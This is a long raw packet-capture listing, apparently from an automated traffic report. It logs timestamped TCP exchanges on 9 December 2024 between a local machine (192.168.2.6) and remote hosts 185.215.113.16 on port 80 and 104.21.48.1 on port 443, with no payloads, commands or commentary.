                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.395987988 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.396029949 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.396302938 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.396342993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.396421909 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.396461964 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.397486925 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.397564888 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.397609949 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.398602009 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.398642063 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.398969889 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.399005890 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.399703979 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.399713993 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.399738073 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.399751902 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.400861025 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.401614904 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.401654959 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.401906013 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.401948929 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.402029037 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.402070045 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.402919054 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.403264046 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.403306961 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.404048920 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.404089928 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.404501915 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.404544115 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.405148983 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.405189991 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.405646086 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.405684948 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.406312943 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.406552076 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.406599998 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.407481909 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.407522917 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.407646894 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.407687902 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.408448935 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.408494949 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.408773899 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.408816099 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.409624100 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.409986973 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.410027027 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.410703897 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.410739899 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.410891056 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.410931110 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.411799908 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.411859989 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.412609100 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.412652969 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.412911892 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.412961006 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.413521051 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.413563967 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.414077997 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.414088964 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.414117098 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.414134026 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.415242910 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.415393114 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.415432930 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.416424990 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.416476965 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.434210062 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.469804049 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.542419910 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.542464972 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.542536020 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.542546034 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.542592049 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.546245098 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.546665907 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.546763897 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.546818018 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.550858021 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.550986052 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.551305056 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.551332951 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.551345110 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.551347971 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.551362991 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.551388025 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.552382946 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.552428961 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.552453995 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.552496910 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.553869009 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.553931952 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.554649115 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.554660082 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.554689884 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.554708004 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.554800034 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.554944038 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.555743933 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.555847883 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.556124926 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.556129932 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.556447029 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.556497097 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.556863070 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.556910992 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.557770967 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.557826996 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.558082104 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.558129072 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.558245897 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.558288097 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.559185982 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.559230089 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.559923887 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.560175896 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.560184956 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.560230970 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.560250998 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.561333895 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.561372042 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.561738968 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.561779976 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.562488079 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.562597990 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.562666893 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.562709093 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.563596964 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.563641071 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.564197063 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.564234018 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.564666033 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.564718008 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.564941883 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.565074921 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.565758944 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.565798044 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.565965891 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.566020012 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.566958904 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.566997051 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.567028999 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.567074060 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.567930937 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.567975998 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.568130016 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.568166018 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.569102049 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.569217920 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.569294930 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.569375038 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.570194006 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.570241928 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.570638895 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.570688009 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.571269989 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.571322918 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.571585894 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.571634054 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.572371960 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.572419882 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.572850943 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.572901011 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.573513985 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.573570013 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.573843002 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.573918104 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.574543953 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.574748993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.574774981 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.574826002 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.575678110 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.575771093 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.576071024 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.576144934 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.576767921 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.576834917 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.576872110 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.576909065 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.577851057 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.577907085 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.578764915 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.578818083 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.579088926 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.579140902 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.579689026 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.579740047 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.580178976 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.580230951 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.580410957 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.580456018 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.581166983 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.581226110 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.581401110 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.581448078 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.582345963 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.582398891 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.582439899 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.582523108 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.583477974 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.583525896 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.583853960 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.583906889 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.584542036 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.584589958 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.584983110 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.585041046 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.585720062 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.585767984 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.585903883 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.585947990 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.586802959 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.586844921 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.586952925 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.586997986 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.587910891 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.587955952 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.588049889 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.588089943 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.588973999 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.589015961 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.589052916 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.589139938 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.590235949 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.590281963 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.590301037 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.590648890 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.591157913 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.591197968 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.591386080 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.591428041 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.592398882 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.592439890 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.592780113 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.592823029 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.593364000 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.593658924 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.593696117 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.594522953 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.594563961 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.594636917 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.594728947 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.595563889 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.595608950 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.595737934 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.596683025 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.596728086 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.597095966 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.597141981 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.597791910 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.597846031 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.597963095 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.599186897 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.599227905 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.599634886 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.599678993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.600169897 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.600219965 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.600399017 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.600441933 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.601139069 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.601197004 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.601430893 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.601474047 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.602260113 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.602302074 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.602385044 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.602428913 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.603370905 CET8049923185.215.113.16192.168.2.6
